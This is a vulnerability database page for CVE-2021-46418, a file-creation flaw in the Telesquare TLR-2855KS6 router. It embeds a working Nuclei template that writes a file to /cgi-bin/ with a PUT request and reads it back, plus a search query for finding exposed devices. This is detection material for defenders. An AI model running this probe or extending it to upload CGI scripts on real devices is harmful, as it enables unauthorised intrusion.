Lucene search
Telesquare TLR-2855KS6 - Arbitrary File Creation
Telesquare TLR-2855KS6 - Unauthorized File Creation vulnerability via PUT method, allowing CGI script creation
Show more
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | Telesquare TLR-2855KS6 - Arbitrary File Creation Vulnerability | 11 Apr 202200:00 | – | zdt |
 | Telesquare TLR-2855KS6 Arbitrary File Creation | 11 Apr 202200:00 | – | packetstorm |
 | CVE-2021-46418 | 7 Apr 202212:15 | – | nvd |
 | Design/Logic Flaw | 7 Apr 202212:15 | – | prion |
 | CVE-2021-46418 | 7 Apr 202212:15 | – | cve |
 | CVE-2021-46418 | 7 Apr 202211:18 | – | cvelist |
 | Telesquare TLR-2855KS6 - Arbitrary File Creation | 11 Apr 202200:00 | – | exploitdb |
id: CVE-2021-46418
info:
name: Telesquare TLR-2855KS6 - Arbitrary File Creation
author: DhiyaneshDK
severity: high
description: |
An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.
reference:
- http://packetstormsecurity.com/files/166674/Telesquare-TLR-2855KS6-Arbitrary-File-Creation.html
- https://github.com/ARPSyndicate/cvemon
- https://nvd.nist.gov/vuln/detail/CVE-2021-46418
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2021-46418
epss-score: 0.07418
epss-percentile: 0.94089
cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: telesquare
product: "tlr-2855ks6"
fofa-query: "product==\"TELESQUARE-TLR-2855KS6\""
tags: packetstorm,cve,cve2021,telesquare,intrusive
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
PUT /cgi-bin/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
{{randstr}}
- |
GET /cgi-bin/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 201'
- 'contains(server_1, "lighttpd") && contains(content_type_2, "text/plain")'
- 'contains(body_2, "{{randstr}}")'
condition: and
# digest: 490a00463044022062bef4317287b8e9efccbd79bb7ff06d011738ae7a47784cca32a892fbf246bf02201ac0932402d8355a5e73b879be7051a9fe3c30ebbec5618bc019ce04d2c5a9a7:922c64590222798bb761d5b6d8e72950Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo03 Apr 2024 07:09Current
7.5High risk
Vulners AI Score7.5
CVSS25
CVSS37.5
EPSS0.0559